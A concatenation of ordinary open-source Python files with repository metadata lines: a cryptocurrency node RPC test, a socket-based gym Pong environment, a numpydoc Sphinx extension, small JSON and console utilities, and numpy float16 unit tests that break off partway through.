check_array_result(nodes[1].listreceivedbyaddress(5),
{"address":addr},
{"address":addr, "account":"", "amount":Decimal("0.1"), "confirmations":10, "txids":[txid,]})
#With min confidence > 10, should not find Tx
check_array_result(nodes[1].listreceivedbyaddress(11),{"address":addr},{ },True)
#Empty Tx
addr = nodes[1].getnewaddress()
check_array_result(nodes[1].listreceivedbyaddress(0,True),
{"address":addr},
{"address":addr, "account":"", "amount":0, "confirmations":0, "txids":[]})
'''
getreceivedbyaddress Test
'''
# Send from node 0 to 1
addr = nodes[1].getnewaddress()
txid = nodes[0].sendtoaddress(addr, 0.1)
sync_mempools(nodes)
#Check balance is 0 because of 0 confirmations
balance = nodes[1].getreceivedbyaddress(addr)
if balance != Decimal("0.0"):
raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
#Check balance is 0.1
balance = nodes[1].getreceivedbyaddress(addr,0)
if balance != Decimal("0.1"):
raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
#Bury Tx under 10 block so it will be returned by the default getreceivedbyaddress
nodes[1].setgenerate(True, 10)
sync_blocks(nodes)
balance = nodes[1].getreceivedbyaddress(addr)
if balance != Decimal("0.1"):
raise AssertionError("Wrong balance returned by getreceivedbyaddress, %0.2f"%(balance))
'''
listreceivedbyaccount + getreceivedbyaccount Test
'''
#set pre-state
addrArr = nodes[1].getnewaddress()
account = nodes[1].getaccount(addrArr)
received_by_account_json = get_sub_array_from_array(nodes[1].listreceivedbyaccount(),{"account":account})
if len(received_by_account_json) == 0:
raise AssertionError("No accounts found in node")
balance_by_account = rec_by_accountArr = nodes[1].getreceivedbyaccount(account)
txid = nodes[0].sendtoaddress(addr, 0.1)
# listreceivedbyaccount should return received_by_account_json because of 0 confirmations
check_array_result(nodes[1].listreceivedbyaccount(),
{"account":account},
received_by_account_json)
# getreceivedbyaddress should return same balance because of 0 confirmations
balance = nodes[1].getreceivedbyaccount(account)
if balance != balance_by_account:
raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))
nodes[1].setgenerate(True, 10)
sync_blocks(nodes)
# listreceivedbyaccount should return updated account balance
check_array_result(nodes[1].listreceivedbyaccount(),
{"account":account},
{"account":received_by_account_json["account"], "amount":(received_by_account_json["amount"] + Decimal("0.1"))})
# getreceivedbyaddress should return updates balance
balance = nodes[1].getreceivedbyaccount(account)
if balance != balance_by_account + Decimal("0.1"):
raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))
#Create a new account named "mynewaccount" that has a 0 balance
nodes[1].getaccountaddress("mynewaccount")
received_by_account_json = get_sub_array_from_array(nodes[1].listreceivedbyaccount(0,True),{"account":"mynewaccount"})
if len(received_by_account_json) == 0:
raise AssertionError("No accounts found in node")
# Test includeempty of listreceivedbyaccount
if received_by_account_json["amount"] != Decimal("0.0"):
raise AssertionError("Wrong balance returned by listreceivedbyaccount, %0.2f"%(received_by_account_json["amount"]))
# Test getreceivedbyaccount for 0 amount accounts
balance = nodes[1].getreceivedbyaccount("mynewaccount")
if balance != Decimal("0.0"):
raise AssertionError("Wrong balance returned by getreceivedbyaccount, %0.2f"%(balance))
if __name__ == '__main__':
ReceivedByTest().main()
| TGDiamond/Diamond | qa/rpc-tests/receivedby.py | Python | mit | 7,275 |
import abc
import socket
import struct
import logging
import msgpack
import scipy.misc
import gym
from gym import error, spaces, utils
from gym.utils import seeding
from gym.envs.classic_control import rendering
import numpy as np
def _receive_data(sock):
# `sock` is the TCP socket connected to the client
data_size_buf = sock.recv(4)
data_size = struct.unpack('i', data_size_buf)[0]
data = bytearray(data_size)
view = memoryview(data)
to_read = data_size
while to_read > 0:
nbytes = sock.recv_into(view, to_read)
view = view[nbytes:] # slicing views is cheap
to_read -= nbytes
# logging.info("{} wrote {} bytes".format(self.client_address[0], len(self.data)))
unpacked = None
try:
unpacked = msgpack.unpackb(data)
# logging.info("Unpacked data length: {}".format(len(unpacked)))
# logging.info("Screen data length: {}".format(len(unpacked[5])))
# print("Unpacked data: {}".format(unpacked))
return unpacked
except Exception as e:
logging.info(e)
def _send_data(sock, action):
response = struct.pack('c', action.to_bytes(1, byteorder="big"))
# logging.info("Sending {} bytes".format(len(response)))
sock.sendall(response)
class RemoteEnv(gym.Env):
__metaclass__ = abc.ABCMeta
def __init__(self, host, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.last_observation = None
def _seed(self, seed=None):
pass
def _decode_game_state(self, message):
# TODO: Make this method abstract.
pass
def _step(self, action):
"""Perform an action and simulate one step in the environment.
Args:
action (object): an action provided by the agent.
Returns:
observation (object): agent's observation of the current environment.
reward (float): amount of reward returned after previous action.
done (boolean): whether the episode has ended, in which case further step()
calls will return undefined results.
info (dict): contains auxiliary diagnostic information (helpful for debugging,
and sometimes learning).
"""
# print('Action: {}'.format(action))
_send_data(self.sock, action)
message = _receive_data(self.sock)
observation, reward, done = self._decode_game_state(message)
self.last_observation = observation
return (observation, reward, done, {})
def _render(self, mode='human', close=False):
pass
def _close(self):
pass
def _reset(self):
"""Resets the state of the environment and returns an initial observation.
Returns:
observation (object): the initial observation of the space.
"""
message = _receive_data(self.sock)
observation, reward, done = self._decode_game_state(message)
self.last_observation = observation
return observation
class SimplePongEnv(RemoteEnv):
metadata = {'render.modes': ['human', 'rgb_array']}
def __init__(self, host, port):
# Initialize parent class.
super().__init__(host, port)
# The Space object corresponding to valid actions
self.action_space = spaces.Discrete(3)
# The Space object corresponding to valid observations
self.observation_space = spaces.Box(low=-1000, high=1000, shape=(8,))
# A tuple corresponding to the min and max possible rewards
# reward_range
reward_range = (-np.inf, np.inf)
# Current scores of players.
self.cpu_score = None
self.player_score = None
self.viewer = None
def _step(self, action):
return super()._step(int(action))
def _decode_game_state(self, message):
step, cpu_score, player_score, ball_pos, ball_vel, cpu_pos, player_pos, height, width, screen = message
reward = 0
if self.cpu_score and self.player_score:
reward = (player_score - self.player_score) - (cpu_score - self.cpu_score)
self.cpu_score = cpu_score
self.player_score = player_score
observation = np.array(ball_pos + ball_vel + cpu_pos + player_pos)
# print(observation)
return observation, reward, reward != 0
def _reset(self):
"""Resets the state of the environment and returns an initial observation.
Returns:
observation (object): the initial observation of the space.
"""
_send_data(self.sock, 0)
return super()._reset()
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
if self.last_observation is not None:
return self.viewer.imshow(self.last_observation)
class PongEnv(RemoteEnv):
metadata = {'render.modes': ['human', 'rgb_array']}
def __init__(self, host, port):
# Initialize parent class.
super().__init__(host, port)
# The Space object corresponding to valid actions
self.action_space = spaces.Discrete(3)
# The Space object corresponding to valid observations
H = 120
W = 240
D = 3
self.observation_space = spaces.Box(low=0, high=255, shape=(H, W, D))
# A tuple corresponding to the min and max possible rewards
# reward_range
reward_range = (-np.inf, np.inf)
# Current scores of players.
self.cpu_score = None
self.player_score = None
self.viewer = None
def _step(self, action):
return super()._step(int(action))
def _decode_game_state(self, message):
step, cpu_score, player_score, height, width, screen = message
screen = np.frombuffer(screen, dtype=np.uint8)
screen = screen.reshape((height, width, 3), order='F').swapaxes(0, 1)
reward = 0
if self.cpu_score and self.player_score:
reward = (player_score - self.player_score) - (cpu_score - self.cpu_score)
self.cpu_score = cpu_score
self.player_score = player_score
return screen, reward, reward != 0
def _reset(self):
"""Resets the state of the environment and returns an initial observation.
Returns:
observation (object): the initial observation of the space.
"""
_send_data(self.sock, 0)
return super()._reset()
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
if self.last_observation is not None:
return self.viewer.imshow(self.last_observation)
class FilteredEnv(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array']}
def __init__(self, env, ob_filter, rew_filter):
self.env = env
# copy over relevant parts of the child env
self._spec = self.env.spec
self.metadata = self.env.metadata
self.action_space = self.env.action_space
ob_space = self.env.observation_space
shape = ob_filter.output_shape(ob_space)
self.observation_space = spaces.Box(-np.inf, np.inf, shape)
self.ob_filter = ob_filter
self.rew_filter = rew_filter
def _step(self, ac):
ob, rew, done, info = self.env._step(ac)
nob = self.ob_filter(ob) if self.ob_filter else ob
nrew = self.rew_filter(rew) if self.rew_filter else rew
info["reward_raw"] = rew
return (nob, nrew, done, info)
def _reset(self):
ob = self.env.reset()
return self.ob_filter(ob) if self.ob_filter else ob
# def _render(self, *args, **kw):
def _render(self, mode='human', close=False):
self.env._render(mode=mode, close=close)
def rgb2gray(rgb):
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b
return gray
class RGBImageToVector(object):
def __init__(self, out_width=80, out_height=80):
self.out_width = out_width
self.out_height = out_height
def __call__(self, obs):
# obs is an M x N x 3 rgb image, want an (out_width x out_height,)
# vector
# nearly 2x faster to downsample then grayscale
downsample = scipy.misc.imresize(obs, (self.out_width, self.out_height, 3))
grayscale = rgb2gray(downsample)
flatten = grayscale.reshape(self.out_width * self.out_height)
return flatten
def output_shape(self, x):
return self.out_width * self.out_height
| akashin/HSE_AI_Labs | Lab_5/Content/Scripts/remote_env.py | Python | mit | 8,942 |
"""
========
numpydoc
========
Sphinx extension that handles docstrings in the Numpy standard format. [1]
It will:
- Convert Parameters etc. sections to field lists.
- Convert See Also section to a See also entry.
- Renumber references.
- Extract the signature from the docstring, if it can't be determined otherwise.
.. [1] http://projects.scipy.org/numpy/wiki/CodingStyleGuidelines#docstring-standard
"""
import os, re, pydoc
from .docscrape_sphinx import get_doc_object, SphinxDocString
from docutils.parsers.rst import Directive
import inspect
def mangle_docstrings(app, what, name, obj, options, lines,
reference_offset=[0]):
cfg = dict(use_plots=app.config.numpydoc_use_plots,
show_class_members=app.config.numpydoc_show_class_members)
if what == 'module':
# Strip top title
title_re = re.compile(r'^\s*[#*=]{4,}\n[a-z0-9 -]+\n[#*=]{4,}\s*',
re.I|re.S)
lines[:] = title_re.sub(u'', u"\n".join(lines)).split(u"\n")
else:
doc = get_doc_object(obj, what, u"\n".join(lines), config=cfg)
lines[:] = str(doc).split(u"\n")
if app.config.numpydoc_edit_link and hasattr(obj, '__name__') and \
obj.__name__:
if hasattr(obj, '__module__'):
v = dict(full_name=u"%s.%s" % (obj.__module__, obj.__name__))
else:
v = dict(full_name=obj.__name__)
lines += [u'', u'.. htmlonly::', '']
lines += [u' %s' % x for x in
(app.config.numpydoc_edit_link % v).split("\n")]
# replace reference numbers so that there are no duplicates
references = []
for line in lines:
line = line.strip()
m = re.match(r'^.. \[([a-z0-9_.-])\]', line, re.I)
if m:
references.append(m.group(1))
# start renaming from the longest string, to avoid overwriting parts
references.sort(key=lambda x: -len(x))
if references:
for i, line in enumerate(lines):
for r in references:
if re.match(r'^\d+$', r):
new_r = u"R%d" % (reference_offset[0] + int(r))
else:
new_r = u"%s%d" % (r, reference_offset[0])
lines[i] = lines[i].replace(u'[%s]_' % r,
u'[%s]_' % new_r)
lines[i] = lines[i].replace(u'.. [%s]' % r,
u'.. [%s]' % new_r)
reference_offset[0] += len(references)
def mangle_signature(app, what, name, obj, options, sig, retann):
# Do not try to inspect classes that don't define `__init__`
if (inspect.isclass(obj) and
(not hasattr(obj, '__init__') or
'initializes x; see ' in pydoc.getdoc(obj.__init__))):
return '', ''
if not (callable(obj) or hasattr(obj, '__argspec_is_invalid_')): return
if not hasattr(obj, '__doc__'): return
doc = SphinxDocString(pydoc.getdoc(obj))
if doc['Signature']:
sig = re.sub(u"^[^(]*", u"", doc['Signature'])
return sig, u''
def setup(app, get_doc_object_=get_doc_object):
global get_doc_object
get_doc_object = get_doc_object_
app.connect('autodoc-process-docstring', mangle_docstrings)
app.connect('autodoc-process-signature', mangle_signature)
app.add_config_value('numpydoc_edit_link', None, False)
app.add_config_value('numpydoc_use_plots', None, False)
app.add_config_value('numpydoc_show_class_members', True, True)
# Extra mangling domains
app.add_domain(NumpyPythonDomain)
app.add_domain(NumpyCDomain)
#------------------------------------------------------------------------------
# Docstring-mangling domains
#------------------------------------------------------------------------------
from docutils.statemachine import ViewList
from sphinx.domains.c import CDomain
from sphinx.domains.python import PythonDomain
class ManglingDomainBase(object):
directive_mangling_map = {}
def __init__(self, *a, **kw):
super(ManglingDomainBase, self).__init__(*a, **kw)
self.wrap_mangling_directives()
def wrap_mangling_directives(self):
for name, objtype in self.directive_mangling_map.items():
self.directives[name] = wrap_mangling_directive(
self.directives[name], objtype)
class NumpyPythonDomain(ManglingDomainBase, PythonDomain):
name = 'np'
directive_mangling_map = {
'function': 'function',
'class': 'class',
'exception': 'class',
'method': 'function',
'classmethod': 'function',
'staticmethod': 'function',
'attribute': 'attribute',
}
class NumpyCDomain(ManglingDomainBase, CDomain):
name = 'np-c'
directive_mangling_map = {
'function': 'function',
'member': 'attribute',
'macro': 'function',
'type': 'class',
'var': 'object',
}
def wrap_mangling_directive(base_directive, objtype):
class directive(base_directive):
def run(self):
env = self.state.document.settings.env
name = None
if self.arguments:
m = re.match(r'^(.*\s+)?(.*?)(\(.*)?', self.arguments[0])
name = m.group(2).strip()
if not name:
name = self.arguments[0]
lines = list(self.content)
mangle_docstrings(env.app, objtype, name, None, None, lines)
self.content = ViewList(lines, self.content.parent)
return base_directive.run(self)
return directive
| mpld3/mpld3 | doc/sphinxext/numpy_ext/numpydoc.py | Python | bsd-3-clause | 5,575 |
# Copyright (c) 2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""console.py"""
import logging
from PyU4V.utils import decorators
LOG = logging.getLogger(__name__)
@decorators.deprecation_notice('utils', 9.1, 10.0)
def choose_from_list(query_category, query_list):
"""Choose an item from a list.
DEPRECATION NOTICE: utils.console.choose_from_list() will be deprecated
in PyU4V version 10.0. For further information please consult PyU4V 9.1
release notes.
:param query_category: query category e.g. snapshot -- str
:param query_list: query selection options -- list
:returns: user selection -- str
"""
print('Choose the {cat} you want from the below list:'.format(
cat=query_category))
for counter, value in enumerate(query_list):
print('{counter}: {value}'.format(counter=counter, value=value))
selection = input('Choice: ')
return query_list[int(selection)]
| ciarams87/PyU4V | PyU4V/utils/console.py | Python | mit | 1,468 |
import collections
import json
import datetime
def dict_from(json_string):
return JSONUtil(json_string).to_odict()
class JSONUtil(object):
def __init__(self, json_input):
self.json_input = json_input
def to_odict(self, raise_exception=False):
if raise_exception:
if not self.valid_json:
raise ValueError('Not a valid JSON string')
return json.loads(self.json_input, object_pairs_hook=collections.OrderedDict)
else:
try:
return json.loads(self.json_input, object_pairs_hook=collections.OrderedDict)
except ValueError:
return collections.OrderedDict()
@property
def valid_json(self):
try:
json.loads(self.json_input)
except ValueError:
return False
return True
def to_pretty_string(self):
return json.dumps(self.json_input, indent=4)
JSON = JSONUtil
class JsonEnhanceEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%dT%H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime('%Y-%m-%d')
return json.JSONEncoder.default(self, obj)
| eyalev/jsonapp | jsonapp/utils/json_util.py | Python | mit | 1,282 |
from __future__ import division, absolute_import, print_function
import platform
import numpy as np
from numpy import uint16, float16, float32, float64
from numpy.testing import run_module_suite, assert_, assert_equal, dec
def assert_raises_fpe(strmatch, callable, *args, **kwargs):
try:
callable(*args, **kwargs)
except FloatingPointError as exc:
assert_(str(exc).find(strmatch) >= 0,
"Did not raise floating point %s error" % strmatch)
else:
assert_(False,
"Did not raise floating point %s error" % strmatch)
class TestHalf(object):
def setup(self):
# An array of all possible float16 values
self.all_f16 = np.arange(0x10000, dtype=uint16)
self.all_f16.dtype = float16
self.all_f32 = np.array(self.all_f16, dtype=float32)
self.all_f64 = np.array(self.all_f16, dtype=float64)
# An array of all non-NaN float16 values, in sorted order
self.nonan_f16 = np.concatenate(
(np.arange(0xfc00, 0x7fff, -1, dtype=uint16),
np.arange(0x0000, 0x7c01, 1, dtype=uint16)))
self.nonan_f16.dtype = float16
self.nonan_f32 = np.array(self.nonan_f16, dtype=float32)
self.nonan_f64 = np.array(self.nonan_f16, dtype=float64)
# An array of all finite float16 values, in sorted order
self.finite_f16 = self.nonan_f16[1:-1]
self.finite_f32 = self.nonan_f32[1:-1]
self.finite_f64 = self.nonan_f64[1:-1]
def test_half_conversions(self):
"""Checks that all 16-bit values survive conversion
to/from 32-bit and 64-bit float"""
# Because the underlying routines preserve the NaN bits, every
# value is preserved when converting to/from other floats.
# Convert from float32 back to float16
b = np.array(self.all_f32, dtype=float16)
assert_equal(self.all_f16.view(dtype=uint16),
b.view(dtype=uint16))
# Convert from float64 back to float16
b = np.array(self.all_f64, dtype=float16)
assert_equal(self.all_f16.view(dtype=uint16),
b.view(dtype=uint16))
# Convert float16 to longdouble and back
# This doesn't necessarily preserve the extra NaN bits,
# so exclude NaNs.
a_ld = np.array(self.nonan_f16, dtype=np.longdouble)
b = np.array(a_ld, dtype=float16)
assert_equal(self.nonan_f16.view(dtype=uint16),
b.view(dtype=uint16))
# Check the range for which all integers can be represented
i_int = np.arange(-2048, 2049)
i_f16 = np.array(i_int, dtype=float16)
j = np.array(i_f16, dtype=int)
assert_equal(i_int, j)
def test_nans_infs(self):
with np.errstate(all='ignore'):
# Check some of the ufuncs
assert_equal(np.isnan(self.all_f16), np.isnan(self.all_f32))
assert_equal(np.isinf(self.all_f16), np.isinf(self.all_f32))
assert_equal(np.isfinite(self.all_f16), np.isfinite(self.all_f32))
assert_equal(np.signbit(self.all_f16), np.signbit(self.all_f32))
assert_equal(np.spacing(float16(65504)), np.inf)
# Check comparisons of all values with NaN
nan = float16(np.nan)
assert_(not (self.all_f16 == nan).any())
assert_(not (nan == self.all_f16).any())
assert_((self.all_f16 != nan).all())
assert_((nan != self.all_f16).all())
assert_(not (self.all_f16 < nan).any())
assert_(not (nan < self.all_f16).any())
assert_(not (self.all_f16 <= nan).any())
assert_(not (nan <= self.all_f16).any())
assert_(not (self.all_f16 > nan).any())
assert_(not (nan > self.all_f16).any())
assert_(not (self.all_f16 >= nan).any())
assert_(not (nan >= self.all_f16).any())
def test_half_values(self):
"""Confirms a small number of known half values"""
a = np.array([1.0, -1.0,
2.0, -2.0,
0.0999755859375, 0.333251953125, # 1/10, 1/3
65504, -65504, # Maximum magnitude
2.0**(-14), -2.0**(-14), # Minimum normal
2.0**(-24), -2.0**(-24), # Minimum subnormal
0, -1/1e1000, # Signed zeros
np.inf, -np.inf])
b = np.array([0x3c00, 0xbc00,
0x4000, 0xc000,
0x2e66, 0x3555,
0x7bff, 0xfbff,
0x0400, 0x8400,
0x0001, 0x8001,
0x0000, 0x8000,
0x7c00, 0xfc00], dtype=uint16)
b.dtype = float16
assert_equal(a, b)
def test_half_rounding(self):
"""Checks that rounding when converting to half is correct"""
a = np.array([2.0**-25 + 2.0**-35, # Rounds to minimum subnormal
2.0**-25, # Underflows to zero (nearest even mode)
2.0**-26, # Underflows to zero
1.0+2.0**-11 + 2.0**-16, # rounds to 1.0+2**(-10)
1.0+2.0**-11, # rounds to 1.0 (nearest even mode)
1.0+2.0**-12, # rounds to 1.0
65519, # rounds to 65504
65520], # rounds to inf
dtype=float64)
rounded = [2.0**-24,
0.0,
0.0,
1.0+2.0**(-10),
1.0,
1.0,
65504,
np.inf]
# Check float64->float16 rounding
b = np.array(a, dtype=float16)
assert_equal(b, rounded)
# Check float32->float16 rounding
a = np.array(a, dtype=float32)
b = np.array(a, dtype=float16)
assert_equal(b, rounded)
def test_half_correctness(self):
"""Take every finite float16, and check the casting functions with
a manual conversion."""
# Create an array of all finite float16s
a_bits = self.finite_f16.view(dtype=uint16)
# Convert to 64-bit float manually
a_sgn = (-1.0)**((a_bits & 0x8000) >> 15)
a_exp = np.array((a_bits & 0x7c00) >> 10, dtype=np.int32) - 15
a_man = (a_bits & 0x03ff) * 2.0**(-10)
# Implicit bit of normalized floats
a_man[a_exp != -15] += 1
# Denormalized exponent is -14
a_exp[a_exp == -15] = -14
a_manual = a_sgn * a_man * 2.0**a_exp
a32_fail = np.nonzero(self.finite_f32 != a_manual)[0]
if len(a32_fail) != 0:
bad_index = a32_fail[0]
assert_equal(self.finite_f32, a_manual,
"First non-equal is half value %x -> %g != %g" %
(self.finite_f16[bad_index],
self.finite_f32[bad_index],
a_manual[bad_index]))
a64_fail = np.nonzero(self.finite_f64 != a_manual)[0]
if len(a64_fail) != 0:
bad_index = a64_fail[0]
assert_equal(self.finite_f64, a_manual,
"First non-equal is half value %x -> %g != %g" %
(self.finite_f16[bad_index],
self.finite_f64[bad_index],
a_manual[bad_index]))
def test_half_ordering(self):
"""Make sure comparisons are working right"""
# All non-NaN float16 values in reverse order
a = self.nonan_f16[::-1].copy()
# 32-bit float copy
b = np.array(a, dtype=float32)
# Should sort the same
a.sort()
b.sort()
assert_equal(a, b)
# Comparisons should work
assert_((a[:-1] <= a[1:]).all())
assert_(not (a[:-1] > a[1:]).any())
assert_((a[1:] >= a[:-1]).all())
assert_(not (a[1:] < a[:-1]).any())
# All != except for +/-0
assert_equal(np.nonzero(a[:-1] < a[1:])[0].size, a.size-2)
assert_equal(np.nonzero(a[1:] > a[:-1])[0].size, a.size-2)
def test_half_funcs(self):
"""Test the various ArrFuncs"""
# fill
assert_equal(np.arange(10, dtype=float16),
np.arange(10, dtype=float32))
# fillwithscalar
a = np.zeros((5,), dtype=float16)
a.fill(1)
assert_equal(a, np.ones((5,), dtype=float16))
# nonzero and copyswap
a = np.array([0, 0, -1, -1/1e20, 0, 2.0**-24, 7.629e-6], dtype=float16)
assert_equal(a.nonzero()[0],
[2, 5, 6])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0],
[2, 5, 6])
# dot
a = np.arange(0, 10, 0.5, dtype=float16)
b = np.ones((20,), dtype=float16)
assert_equal(np.dot(a, b),
95)
# argmax
a = np.array([0, -np.inf, -2, 0.5, 12.55, 7.3, 2.1, 12.4], dtype=float16)
assert_equal(a.argmax(),
4)
a = np.array([0, -np.inf, -2, np.inf, 12.55, np.nan, 2.1, 12.4], dtype=float16)
assert_equal(a.argmax(),
5)
# getitem
a = np.arange(10, dtype=float16)
for i in range(10):
assert_equal(a.item(i), i)
def test_spacing_nextafter(self):
"""Test np.spacing and np.nextafter"""
# All non-negative finite #'s
a = np.arange(0x7c00, dtype=uint16)
hinf = np.array((np.inf,), dtype=float16)
a_f16 = a.view(dtype=float16)
assert_equal(np.spacing(a_f16[:-1]), a_f16[1:]-a_f16[:-1])
assert_equal(np.nextafter(a_f16[:-1], hinf), a_f16[1:])
assert_equal(np.nextafter(a_f16[0], -hinf), -a_f16[1])
assert_equal(np.nextafter(a_f16[1:], -hinf), a_f16[:-1])
# switch to negatives
a |= 0x8000
assert_equal(np.spacing(a_f16[0]), np.spacing(a_f16[1]))
assert_equal(np.spacing(a_f16[1:]), a_f16[:-1]-a_f16[1:])
assert_equal(np.nextafter(a_f16[0], hinf), -a_f16[1])
assert_equal(np.nextafter(a_f16[1:], hinf), a_f16[:-1])
assert_equal(np.nextafter(a_f16[:-1], -hinf), a_f16[1:])
def test_half_ufuncs(self):
"""Test the various ufuncs"""
a = np.array([0, 1, 2, 4, 2], dtype=float16)
b = np.array([-2, 5, 1, 4, 3], dtype=float16)
c = np.array([0, -1, -np.inf, np.nan, 6], dtype=float16)
assert_equal(np.add(a, b), [-2, 6, 3, 8, 5])
assert_equal(np.subtract(a, b), [2, -4, 1, 0, -1])
assert_equal(np.multiply(a, b), [0, 5, 2, 16, 6])
assert_equal(np.divide(a, b), [0, 0.199951171875, 2, 1, 0.66650390625])
assert_equal(np.equal(a, b), [False, False, False, True, False])
assert_equal(np.not_equal(a, b), [True, True, True, False, True])
assert_equal(np.less(a, b), [False, True, False, False, True])
assert_equal(np.less_equal(a, b), [False, True, False, True, True])
assert_equal(np.greater(a, b), [True, False, True, False, False])
assert_equal(np.greater_equal(a, b), [True, False, True, True, False])
assert_equal(np.logical_and(a, b), [False, True, True, True, True])
assert_equal(np.logical_or(a, b), [True, True, True, True, True])
assert_equal(np.logical_xor(a, b), [True, False, False, False, False])
assert_equal(np.logical_not(a), [True, False, False, False, False])
assert_equal(np.isnan(c), [False, False, False, True, False])
assert_equal(np.isinf(c), [False, False, True, False, False])
assert_equal(np.isfinite(c), [True, True, False, False, True])
assert_equal(np.signbit(b), [True, False, False, False, False])
assert_equal(np.copysign(b, a), [2, 5, 1, 4, 3])
assert_equal(np.maximum(a, b), [0, 5, 2, 4, 3])
x = np.maximum(b, c)
assert_(np.isnan(x[3]))
x[3] = 0
assert_equal(x, [0, 5, 1, 0, 6])
assert_equal(np.minimum(a, b), [-2, 1, 1, 4, 2])
x = np.minimum(b, c)
assert_(np.isnan(x[3]))
x[3] = 0
assert_equal(x, [-2, -1, -np.inf, 0, 3])
assert_equal(np.fmax(a, b), [0, 5, 2, 4, 3])
assert_equal(np.fmax(b, c), [0, 5, 1, 4, 6])
assert_equal(np.fmin(a, b), [-2, 1, 1, 4, 2])
assert_equal(np.fmin(b, c), [-2, -1, -np.inf, 4, 3])
assert_equal(np.floor_divide(a, b), [0, 0, 2, 1, 0])
assert_equal(np.remainder(a, b), [0, 1, 0, 0, 2])
assert_equal(np.divmod(a, b), ([0, 0, 2, 1, 0], [0, 1, 0, 0, 2]))
assert_equal(np.square(b), [4, 25, 1, 16, 9])
assert_equal(np.reciprocal(b), [-0.5, 0.199951171875, 1, 0.25, 0.333251953125])
assert_equal(np.ones_like(b), [1, 1, 1, 1, 1])
assert_equal(np.conjugate(b), b)
assert_equal(np.absolute(b), [2, 5, 1, 4, 3])
assert_equal(np.negative(b), [2, -5, -1, -4, -3])
assert_equal(np.positive(b), b)
assert_equal(np.sign(b), [-1, 1, 1, 1, 1])
assert_equal(np.modf(b), ([0, 0, 0, 0, 0], b))
assert_equal(np.frexp(b), ([-0.5, 0.625, 0.5, 0.5, 0.75], [2, 3, 1, 3, 2]))
assert_equal(np.ldexp(b, [0, 1, 2, 4, 2]), [-2, 10, 4, 64, 12])
def test_half_coercion(self):
"""Test that half gets coerced properly with the other types"""
a16 = np.array((1,), dtype=float16)
a32 = np.array((1,), dtype=float32)
b16 = float16(1)
b32 = float32(1)
assert_equal(np.power(a16, 2).dtype, float16)
assert_equal(np.power(a16, 2.0).dtype, float16)
assert_equal(np.power(a16, b16).dtype, float16)
assert_equal(np.power(a16, b32).dtype, float16)
assert_equal(np.power(a16, a16).dtype, float16)
assert_equal(np.power(a16, a32).dtype, float32)
assert_equal(np.power(b16, 2).dtype, float64)
assert_equal(np.power(b16, 2.0).dtype, float64)
assert_equal(np.power(b16, b16).dtype, float16)
assert_equal(np.power(b16, b32).dtype, float32)
assert_equal(np.power(b16, a16).dtype, float16)
assert_equal(np.power(b16, a32).dtype, float32)
assert_equal(np.power(a32, a16).dtype, float32)
assert_equal(np.power(a32, b16).dtype, float32)
assert_equal(np.power(b32, a16).dtype, float16)
assert_equal(np.power(b32, b16).dtype, float32)
@dec.skipif(platform.machine() == "armv5tel", "See gh-413.")
def test_half_fpe(self):
with np.errstate(all='raise'):
sx16 = np.array((1e-4,), dtype=float16)
bx16 = np.array((1e4,), dtype=float16)
sy16 = float16(1e-4)
by16 = float16(1e4)
# Underflow errors
assert_raises_fpe('underflow', lambda a, b:a*b, sx16, sx16)
assert_raises_fpe('underflow', lambda a, b:a*b, sx16, sy16)
assert_raises_fpe('underflow', lambda a, b:a*b, sy16, sx16)
assert_raises_fpe('underflow', lambda a, b:a*b, sy16, sy16)
assert_raises_fpe('underflow', lambda a, b:a/b, sx16, bx16)
assert_raises_fpe('underflow', lambda a, b:a/b, sx16, by16)
assert_raises_fpe('underflow', lambda a, b:a/b, sy16, bx16)
assert_raises_fpe('underflow', lambda a, b:a/b, sy16, by16)
assert_raises_fpe('underflow', lambda a, b:a/b,
float16(2.**-14), float16(2**11))
assert_raises_fpe('underflow', lambda a, b:a/b,
float16(-2.**-14), float16(2**11))
assert_raises_fpe('underflow', lambda a, b:a/b,
float16(2.**-14+2**-24), float16(2))
assert_raises_fpe('underflow', lambda a, b:a/b,
float16(-2.**-14-2**-24), float16(2))
assert_raises_fpe('underflow', lambda a, b:a/b,
float16(2.**-14+2**-23), float16(4))
# Overflow errors
assert_raises_fpe('overflow', lambda a, b:a*b, bx16, bx16)
assert_raises_fpe('overflow', lambda a, b:a*b, bx16, by16)
assert_raises_fpe('overflow', lambda a, b:a*b, by16, bx16)
assert_raises_fpe('overflow', lambda a, b:a*b, by16, by16)
assert_raises_fpe('overflow', lambda a, b:a/b, bx16, sx16)
assert_raises_fpe('overflow', lambda a, b:a/b, bx16, sy16)
assert_raises_fpe('overflow', lambda a, b:a/b, by16, sx16)
assert_raises_fpe('overflow', lambda a, b:a/b, by16, sy16)
assert_raises_fpe('overflow', lambda a, b:a+b,
float16(65504), float16(17))
assert_raises_fpe('overflow', lambda a, b:a-b,
float16(-65504), float16(17))
assert_raises_fpe('overflow', np.nextafter, float16(65504), float16(np.inf))
assert_raises_fpe('overflow', np.nextafter, float16(-65504), float16(-np.inf))
assert_raises_fpe('overflow', np.spacing, float16(65504))
# Invalid value errors
assert_raises_fpe('invalid', np.divide, float16(np.inf), float16(np.inf))
assert_raises_fpe('invalid', np.spacing, float16(np.inf))
